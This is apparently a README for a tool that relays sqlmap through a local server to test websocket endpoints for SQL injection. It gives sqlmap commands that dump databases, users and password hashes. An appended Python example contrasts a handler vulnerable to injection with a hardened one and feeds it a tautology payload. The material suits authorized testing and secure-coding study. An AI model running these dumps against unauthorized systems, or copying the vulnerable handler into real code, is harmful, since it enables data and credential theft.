Websocket SQLi
- SQLmap is not able to send websocket requests directly because of the id added to the request. Therefore you need a local webserver as middleware which translates requests to the target. Put the webserver URL and the correct data structure into the script and run it.
sqlmap -u "http://127.0.0.1:8081/?id=62009" -p "id" --dbs
Usage
First, make sure websocket-client is installed from PyPI.
Enumerate the websocket via the websocket enumeration script. You may provide the URL endpoint you want to request and the key and value of the request via the arguments in the following way:
websocket_enumeration.py /values key value
I modified the script rayhan0x01 provides so that an endpoint can be set. The modified script is started in the following way:
sqlmap_websocket_server.py /endpoint
Start sqlmap requesting the sqlmap_websocket_server on localhost port 8081:
sqlmap -u "http://127.0.0.1:8081/?id=1" --batch --risk 3 --level 5 --flush-session --dump --passwords --users
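The server-side flaw this setup tests for, and its fix, as an added example that is not part of this repository: a handler that concatenates the `id` field of a websocket JSON message into SQL, next to one that validates and binds it. The `items` table, the handler names and the sample messages are constructed for illustration, and the frames are passed in as plain strings so the block runs without a network.

```python
import json
import sqlite3


def make_db():
    """Constructed in-memory sample data (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO items VALUES (?, ?)",
                   [(1, "alpha"), (2, "beta"), (3, "gamma")])
    return db


def handle_vulnerable(db, message):
    """Concatenates the 'id' field of the websocket frame into the query."""
    value = json.loads(message)["id"]
    query = "SELECT name FROM items WHERE id = " + str(value)
    return json.dumps([row[0] for row in db.execute(query)])


def handle_hardened(db, message):
    """Rejects non-integer ids, then binds the value as a parameter."""
    bad = json.dumps({"error": "bad request"})
    try:
        value = json.loads(message)["id"]
    except (ValueError, KeyError, TypeError):
        return bad
    if isinstance(value, str):
        # ASCII digits only: int() would raise on characters such as "²".
        if not (value.isascii() and value.isdigit()):
            return bad
    elif isinstance(value, bool) or not isinstance(value, int):
        return bad
    rows = db.execute("SELECT name FROM items WHERE id = ?", (int(value),))
    return json.dumps([row[0] for row in rows])


if __name__ == "__main__":
    db = make_db()
    # Constructed frames: one benign, one carrying a boolean tautology.
    for frame in ('{"id": "1"}', '{"id": "1 OR 1=1"}'):
        print(frame, "vulnerable:", handle_vulnerable(db, frame))
        print(frame, "hardened:  ", handle_hardened(db, frame))
```

The transport makes no difference to the fix: a value arriving in a websocket frame needs the same type check and parameter binding as one arriving in an HTTP query string.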